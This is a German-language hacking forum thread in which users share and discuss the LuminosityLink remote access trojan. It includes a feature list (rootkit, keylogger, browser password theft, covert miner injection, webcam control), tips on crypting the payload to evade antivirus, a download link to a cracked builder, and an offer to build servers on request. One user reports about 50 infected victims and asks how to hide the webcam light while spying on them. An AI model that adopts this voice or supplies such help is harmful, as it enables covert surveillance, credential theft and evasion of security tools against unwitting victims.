Als Gast hast du nur eingeschränkten Zugriff!
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
- Antworte auf Themen oder erstelle deine eigenen.
- Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
- Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
- Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
Deleted
#25566
Geschrieben 27 February 2015 - 15:53 Uhr
#31566
Geschrieben 13 July 2015 - 03:56 Uhr
BELIEBT
Incredibly Stable, Effective and Reliable!
[+]Remote Desktop, Remote Webcam, and Client Manager
[+]Fast Reverse SOCKS4/5 Proxy
[+]System Wide Ring3 Rootkit (x86 Processes) With Process Watchdog
[+]Advanced Process, File, and Startup Persistence
[+]Powerful Heuristic-Based Bot Killer (Anti-Malware)
[+]Blacklist Software and Processes. Luminosity removes them!
[+]SmartLogger (Logs all Keystrokes, - Specify certain programs to record separately)
[+]Download Manager - Resume/Pause/Cancel Transfers, Proper File Queue, Organized well
[+]File Grabber - Search for file on client, and queue it for download. Can search certain process directories and much more!
[+]Google Chrome, FireFox, IE, Opera, Safari, FileZila, and Win Serial Key Recovery
[+]File Guard - Guard Executable Files (Other RATs, keyloggers, etc) - Takes care of Undetection, Persistence, and Startup!
[+]Crypto Currency Miner - Injects miner files.
[+]Website Visitor - 4 View Methods - Mute Audio
[+]Client Info - Manage and Grab Info Regarding Clients
[+]Torrent Seeder
[+]Extensive On-Join Commands | Client ID/Version/Client Name |
[+]HTTP Control - Send Commands via Webpage Encrypted
[+]Remote Scripting (HTML/VBS/BATCH)
[+]Block installation and use of any specified software
[+]Tons more features...And more being added!
Instructions
Run LuminosityLink Server by 0x22 to establish a fake connection
Run LuminosityLink to start the program.
SCAN archive no crypted :
Scan Analysis Binaries :
1-
2-
- caballo, gravel, romiro und 7 anderen gefällt das
Thanked by 1 Member:
|
|
#22
Geschrieben 08 March 2015 - 14:24 Uhr
Soweit ich weiß bei .net immer Self-Inject.
@eXaIT
Wie der Kollege yq8 schon betont hat, ist es bei .Net üblich selfinjection zu wählen.
Desweiteren ist es am schlausten bei einem Rat, welches man crypten möchte, lediglich die Connectioninfos einzutragen.
Weder Autostart, noch Icon, oder sonst irgendetwas.
ALLE anderen Optionen sollten beim Crypter getroffen werden!
Grüße
Cube
Thanked by 1 Member:
|
|
#23
Geschrieben 09 March 2015 - 15:08 Uhr
@eXaIT
Wie der Kollege yq8 schon betont hat, ist es bei .Net üblich selfinjection zu wählen.
Desweiteren ist es am schlausten bei einem Rat, welches man crypten möchte, lediglich die Connectioninfos einzutragen.
Weder Autostart, noch Icon, oder sonst irgendetwas.
ALLE anderen Optionen sollten beim Crypter getroffen werden!
Grüße
Cube
Danke Für die Info. Hab jetzt ca. 50 Vics und das RAT läuft noch extrem flüssig. Allerdings funktioniert bei mir das Plugin nicht, welches die Lampe/LED der Webcam ausschaltet, wenn man die webcam remotet. Einer ne Ahnung wie man das fixxen kann?
Thanked by 1 Member:
|
|
#28
Geschrieben 09 March 2015 - 20:51 Uhr
Thanked by 1 Member:
|
|
#29
Geschrieben 09 March 2015 - 21:21 Uhr
Also ich habe keine Ahnung, wie yq8 den gecrackten Builder dort geschrieben hat.
An alle, die einen Server vom original IM brauchen, sollen mich PMen und mir folgende Infos senden:
- IP zum Host
- Port der verwendet werden soll
- Funktionen etc.
Greetz
notfound
//EDIT:
Ungecrypteter IM Server hat 13 Detections:
Bearbeitet von notfound, 09 March 2015 - 21:34 Uhr.
- byte gefällt das
#30
Geschrieben 09 March 2015 - 21:28 Uhr
Vic ist schon wieder einfach aus meiner Liste verschwunden, weil ich nicht die Assembly Settings bearbeiten kann.
Ich denke dann macht es 0 sinn den RAT zu benutzen, wenn da bei eigenschaften Microsoft Corporation etc steht, und die Datei sowieso von Microsoft erkannt und gelöscht wird.
Das ist doch total unwichtig, die entscheidenden Assembly Infos werden, wie Cube bereits beantwortet hat, im Crypter getroffen.
Ich vermute deine Datei wird von Windows erkannt, weil sie detected ist, und genau dazu ist der Crypter da ;o)
Bearbeitet von ice, 09 March 2015 - 21:29 Uhr.
P R E M I U M G F X S E R V I C E B Y I C E
#31
Geschrieben 09 March 2015 - 21:32 Uhr
Das ist doch total unwichtig, die entscheidenden Assembly Infos werden, wie Cube bereits beantwortet hat, im Crypter getroffen.
Ich vermute deine Datei wird von Windows erkannt, weil sie detected ist, und genau dazu ist der Crypter da ;o)
Also ich gehe mal davon aus, dass er das File gecryptet hat^^
Wenn ja, change die Assembly und das Icon einfach - Hierzu RessourceHacker oder andere Tools benutzen.
Greetz
notfound
#32
Geschrieben 09 March 2015 - 21:51 Uhr
Update:
Da sich ja jeder hier über meinen Builder beschwert hab ich mich kurz rangesetzt und ihn gefixt.
Folgende Bugs sind jetzt behoben:
- Assembly Info werden jetzt korrekt geupdated.
- Icon wird angezeigt wenn ausgewählt
Download Builder v1.1:
http://puu.sh/gtwhA/9980df948c.zip
Bearbeitet von yq8, 09 March 2015 - 21:56 Uhr.
- eXalT, Bad Grandpa und Bypass gefällt das
#36
Geschrieben 09 March 2015 - 22:28 Uhr
Update:
Da sich ja jeder hier über meinen Builder beschwert hab ich mich kurz rangesetzt und ihn gefixt.
Folgende Bugs sind jetzt behoben:
- Assembly Info werden jetzt korrekt geupdated.
- Icon wird angezeigt wenn ausgewählt
Download Builder v1.1:
http://puu.sh/gtwhA/9980df948c.zip
3. Tools eintragen
- 3.2 Zu jedem eingetragenen Tool muss ebenfalls ein Virustotal- oder Elementscanner-Check vorliegen.
- 3.3 Wir übernehmen keine Haftung für mögliche Schäden die durch Tools verursacht werden können.
- Bypass gefällt das
#37
Geschrieben 12 March 2015 - 01:24 Uhr
Update:
Da sich ja jeder hier über meinen Builder beschwert hab ich mich kurz rangesetzt und ihn gefixt.
Folgende Bugs sind jetzt behoben:
- Assembly Info werden jetzt korrekt geupdated.
- Icon wird angezeigt wenn ausgewählt
Download Builder v1.1:
http://puu.sh/gtwhA/9980df948c.zip
Ich bin bei dem Builder skeptisch, wegen der Beschreibung;
Hat die neue version vom Builder jmd schon tested?
Bearbeitet von Bypass, 12 March 2015 - 01:24 Uhr.
#40
Geschrieben 12 March 2015 - 21:17 Uhr
Software bedingtes Licht wird durch das Plugin deaktiviert, Hardware bedingtes Licht hingegen nicht.
LG
Crap
- Cube und Bypass gefällt das
Thanked by 1 Member:
|
|
Thema | Forum | Themenstarter | Statistik | Letzter Beitrag | |
---|---|---|---|---|---|
Deleted |
Crypter | Crap |
|
|
|
Deleted |
Checker | Crap |
|
|
|
Deleted |
Crypter | Crap |
|
|